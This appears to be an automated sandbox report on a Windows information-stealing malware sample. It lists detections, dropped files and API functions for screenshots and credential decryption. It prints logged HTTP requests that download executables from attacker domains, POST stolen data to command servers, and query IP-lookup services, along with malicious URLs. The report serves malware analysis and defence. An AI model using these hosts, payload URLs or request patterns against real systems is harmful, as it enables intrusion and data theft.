Windows Analysis Report 7yyqdBJVGf.exe

AV Detection:

Antivirus detection for URL or domain

Source: http://zukelx03.top/downfiles/lv.exe

Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Source: 7yyqdBJVGf.exe	Virustotal: Detection: 52%			Perma Link
Source: 7yyqdBJVGf.exe	ReversingLabs: Detection: 48%

Multi AV Scanner detection for domain / URL

Source: http://zukelx03.top/downfiles/lv.exe

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\File.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	ReversingLabs: Detection: 35%

Machine Learning detection for sample

Source: 7yyqdBJVGf.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 13.0.wheezy.exe.4e0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.2.wheezy.exe.4e0000.0.unpack	Avira: Label: TR/Dropper.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00401220 GetFileAttributesW,CreateFileW,GetFileSizeEx,CloseHandle,CreateFileMappingW,MapViewOfFile,CloseHandle,CloseHandle,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,		0_2_00401220
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E662D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,		13_2_004E662D

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Unpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack

Uses 32bit PE files

Source: 7yyqdBJVGf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses new MSVCR Dlls

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
Source:	Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
Source:	Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
Source:	Binary string: acppage.pdb source: acppage.dll.10.dr

Spreading:

Enumerates the file system

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files			Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose,		0_2_004026C0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0042B3BE FindFirstFileExW,		0_2_0042B3BE
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_00406301 FindFirstFileW,FindClose,		10_2_00406301
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		10_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		13_2_004E23D4

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Domain query: iplogger.org
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 88.99.66.31 187

May check the online IP address of the machine

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	DNS query: name: ip-api.com
Source: C:\Windows\SysWOW64\wscript.exe	DNS query: name: iplogger.org

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1

Yara detected Generic Downloader

Source: Yara match	File source: 24.2.Bisogna.exe.com.39857c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Bisogna.exe.com.395ebb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Bisogna.exe.com.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Bisogna.exe.com.393bfa8.2.raw.unpack, type: UNPACKEDPE

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 13:24:11 GMTServer: Apache/2.2.22 (@RELEASE@)Last-Modified: Tue, 28 Sep 2021 09:56:00 GMTETag: "380018-44fbf6-5cd0b38838d02"Accept-Ranges: bytesContent-Length: 4520950Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 17 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 18 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 18 ef 00 00 00 00 16 00 00 f0 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /1N5Jh7 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iplogger.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: pacdpo22.topContent-Length: 73148Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: moreil02.topContent-Length: 73136Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ip-api.comConnection: Keep-Alive

URLs found in memory or binary data

Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp	String found in binary or memory: http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wheezy.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wheezy.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580849231.0000000000C93000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/jsonC:
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/jsonH
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/jsonQ
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/jsoncountryCodeinvalid
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/jsonq
Source: File.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 7yyqdBJVGf.exe, 00000000.00000003.296660042.0000000002E58000.00000004.00000001.sdmp	String found in binary or memory: http://pacdpo22.top/index.php
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 7yyqdBJVGf.exe, 00000000.00000002.316458179.0000000005220000.00000004.00000001.sdmp	String found in binary or memory: http://zukelx03.top/downfiles/lv.exe
Source: 7yyqdBJVGf.exe, 7yyqdBJVGf.exe, 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://zukelx03.top/download.php?file=lv.exe
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: https://evernote.com/
Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, wscript.exe, 00000029.00000003.581967633.0000000005773000.00000004.00000040.sdmp	String found in binary or memory: https://iplogger.org/1N5Jh7
Source: 7yyqdBJVGf.exe, 00000000.00000002.316164733.0000000002E60000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.comXf;
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: pacdpo22.top

Contains functionality to download additional files from the internet

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040E340

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /1N5Jh7 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iplogger.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ip-api.comConnection: Keep-Alive

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: pacdpo22.topContent-Length: 73148Cache-Control: no-cache

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\File.exe

Code function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

10_2_004044D1

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\File.exe

Code function: 10_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

10_2_004050F9

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0040B180 RegQueryValueExW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,CopyFileW,

0_2_0040B180

System Summary:

Submitted sample is a known malware sample

Source: C:\Windows\SysWOW64\cmd.exe

Dropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon

PE file contains section with special chars

Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_004140F0		0_2_004140F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00414800		0_2_00414800
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0041BF2F		0_2_0041BF2F
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00434000		0_2_00434000
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0041C194		0_2_0041C194
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00412210		0_2_00412210
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0042E2EE		0_2_0042E2EE
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00411650		0_2_00411650
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00430B0C		0_2_00430B0C
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00422BF0		0_2_00422BF0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00420C29		0_2_00420C29
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00430C2C		0_2_00430C2C
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0041BCFD		0_2_0041BCFD
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00413D80		0_2_00413D80
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00432FBD		0_2_00432FBD
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_03094340		0_2_03094340
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0309C3E4		0_2_0309C3E4
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_030B320D		0_2_030B320D
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0309C17F		0_2_0309C17F
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_0040737E		10_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_00406EFE		10_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_004079A2		10_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_004049A8		10_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E9871		13_2_004E9871
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004EA81D		13_2_004EA81D
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004EA418		13_2_004EA418
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E9551		13_2_004E9551
